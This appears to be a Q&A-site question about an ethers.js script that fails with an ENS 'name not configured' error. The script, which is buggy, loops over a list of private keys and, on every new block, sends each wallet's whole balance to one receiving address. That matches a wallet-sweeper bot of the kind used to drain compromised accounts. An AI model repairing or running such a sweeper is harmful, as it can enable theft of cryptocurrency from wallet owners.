# ENS name not configured

Tags: javascript, ethereum, ethers.js

I use the ENS address for my code

```
const {ethers} = require('ethers')

const provider = new ethers.providers.JsonRpcProvider("")

const addressReceiver = 'ENS.eth'

const privateKeys = ["AAAAAAA"]

const bot = async =>{
    provider.on('block', async () => {
        console.log('Listening to new block, waiting ;)');

        for (let i = 0; i < privateKeys.length; i++) { 
            const _target = new ethers.Wallet(privateKeys[i]);
            const target = _target.connect(provider);
            const balance = await provider.getBalance(target.address);
            const gasLimit = await provider.estimateGas({
                to: addressReceiver,
                value: await provider.getBalance(target.address),
                gasLimit: 21000,
                gasPrice: ethers.utils.parseUnits('10', 'gwei'),
                nonce: await provider.getTransactionCount(privateKeys[i])
            })


            if (balance.sub(gasLimit) > 0) {
                console.log("New Account with Eth!");
                const amount = balance.sub(tx.maxFeePerGas.mul(gasLimit));
                try {
                    await target.sendTransaction({
                        to: addressReceiver,
                        value: amount
                    });
                    console.log(`Success! transferred -->${ethers.utils.formatEther(balance)}`);
                } catch (e) {
                    console.log(`error: ${e}`);
                }
            }
        }
    })

}
bot();
```

but I still get an error:
reason: 'ENS name not configured',
code: 'UNSUPPORTED_OPERATION',
operation: 'resolveName("AAAAAAA")`

I bought my ENS address for a year, but I don't understand what the problem is.
Please help me fix this me fix this?